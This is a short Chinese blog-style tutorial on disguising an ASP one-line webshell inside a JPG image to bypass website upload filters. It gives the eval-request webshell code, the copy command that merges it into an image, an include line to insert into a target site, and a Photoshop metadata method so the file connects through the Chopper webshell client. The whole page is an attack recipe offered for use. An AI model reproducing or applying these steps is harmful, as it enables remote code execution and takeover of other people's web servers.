您的位置:首页 > 其它

图片木马绕过站点上传文件检查

2017-03-03 14:43 453 查看
第一种方法:

利用copy命令

详细操作为

1.随便找一张图片 名字改成1.jpg(名字改为1.jpg只是为了方便记忆和输入 文件的后缀随意 只要是图片的格式就可以了)

2.<%eval request(“keio”)%> 存为1.asp(就是一句话木马)

3.copy 1.jpg /b + 1.asp /a 2.jpg



解释一下代码

复制当前目录下的 1.jpg 图片和当前目录下的 1.asp 文件并以ASCII代码的方式合并为 2.jpg 图片

运行 1.bat 就会出现一个图片 2.jpg

而这个2.jpg就是已经做好的木马了

把一句话木马合并到了图片里以后

再把以下代码插入目标网站的任意文件即可

<% #include files=”2.jpg”%>

第二种方法:

1.用PS(photoshop)打开图片

2.文件→文件简介

插入你需要的木马代码

3.文件→保存(保存:覆盖源文件 你也可以另存为你想要的其它格式)

改为图片后缀可以正常打开

改为asp后缀木马也可以使用菜刀正常连接
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签: 
相关文章推荐